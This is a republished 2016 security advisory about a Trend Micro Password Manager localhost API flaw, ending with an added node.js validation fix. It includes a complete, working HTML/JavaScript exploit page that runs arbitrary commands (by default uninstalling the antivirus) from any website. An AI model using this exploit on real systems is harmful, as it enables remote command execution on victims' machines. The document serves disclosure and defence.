TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands
Source: https://code.google.com/p/google-security-research Author: Google Published: 2016-01-12
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=693
 
When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.
 
http://www.trendmicro.com/us/home/products/software/password-manager/index.html
 
This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.
 
It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().
 
This means any website can launch arbitrary commands, like this:
 
x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {};
 
(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
-->
 
<html>
<head>
    <title>Trend Micro Maximum Security 10 Exploit</title>
</head>
<body>
    <p>
    Sample exploit for Trend Micro Maximum Security 10.
    <p>
    -- Tavis Ormandy.
    <p>
    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
    <p>
    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
    <p>
    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
<script>
    function begin() {
        // The command you want to run; arguments will work, but don't use single quotes.
        // Let's uninstall Trend Micro.
        var cmd  = document.getElementById('command').value;
 
        // Start port: Trend Micro tries to open a port starting here until it works.
        var port = 49155;
 
        // Wrapper code to start cmd.
        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])";
 
        // We can't send quotes, so encode that via character codes.
        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');
 
        // Create the XHRs.
        for (; port <= 49160; port++) {
            var x = new XMLHttpRequest();
 
            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);
 
            // We can't tell if it worked because of the cross domain policy.
            try { x.send(); } catch (e) {};
        }
    }
</script>
</body>
</html>
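The advisory above turns on two missing checks in a localhost RPC service: any website could drive the API with a cross-origin XHR, and the `url` parameter was handed to ShellExecute() (or, for `showSB`, evaluated as a `javascript:` URL) without being restricted to web URLs. As an added example that is not part of the original advisory or Trend Micro's code, here is the request-validation logic such an endpoint should apply, written for node.js since that is what the product was built on; the `ALLOWED_ORIGINS` entry is an assumption and the port comes from the advisory.

```javascript
// Added example, not the original exploit nor Trend Micro's code: the checks a
// localhost RPC endpoint like /api/openUrlInDefaultBrowser should apply.
// Assumption: only pages from ALLOWED_ORIGINS may call the local API.
const ALLOWED_ORIGINS = new Set(['https://passwordmanager.example']);

function isAllowedOrigin(origin) {
  // Browsers attach Origin to cross-site XHR; a missing or foreign value is
  // rejected rather than assumed friendly. (Origin can be set freely by
  // non-browser clients, so this defends against web pages, not local malware.)
  return typeof origin === 'string' && ALLOWED_ORIGINS.has(origin);
}

function validateOpenUrl(raw) {
  let u;
  try { u = new URL(raw); } catch (e) { return { ok: false, reason: 'not a URL' }; }
  // WHATWG parsing treats "c:/windows/..." as scheme "c:" and keeps
  // "javascript:" as a scheme, so one scheme allowlist covers both vectors.
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    return { ok: false, reason: 'scheme ' + u.protocol + ' not allowed' };
  }
  return { ok: true, url: u.href };
}

// Pure decision function: returns the HTTP status and body the endpoint should
// answer with, and never launches anything itself.
function handleOpenUrl(headers, requestUrl) {
  if (!isAllowedOrigin(headers.origin)) {
    return { status: 403, body: 'origin not allowed' };
  }
  const params = new URL(requestUrl, 'http://localhost').searchParams;
  const v = validateOpenUrl(params.get('url') || '');
  if (!v.ok) return { status: 400, body: v.reason };
  return { status: 200, body: 'would hand ' + v.url + ' to the default browser' };
}

// Wire the decision into a real listener only when run directly (CommonJS).
if (typeof require !== 'undefined' && require.main === module) {
  require('http').createServer((req, res) => {
    const r = handleOpenUrl(req.headers, req.url);
    res.writeHead(r.status, { 'Content-Type': 'text/plain' });
    res.end(r.body);
  }).listen(49155, '127.0.0.1'); // port taken from the advisory
}
```

Because the decision is separated from the listener, the same function can be exercised in tests with the exact request shapes the advisory shows (a foreign origin, a `c:/...` path, a `javascript:` URL) and must refuse all three.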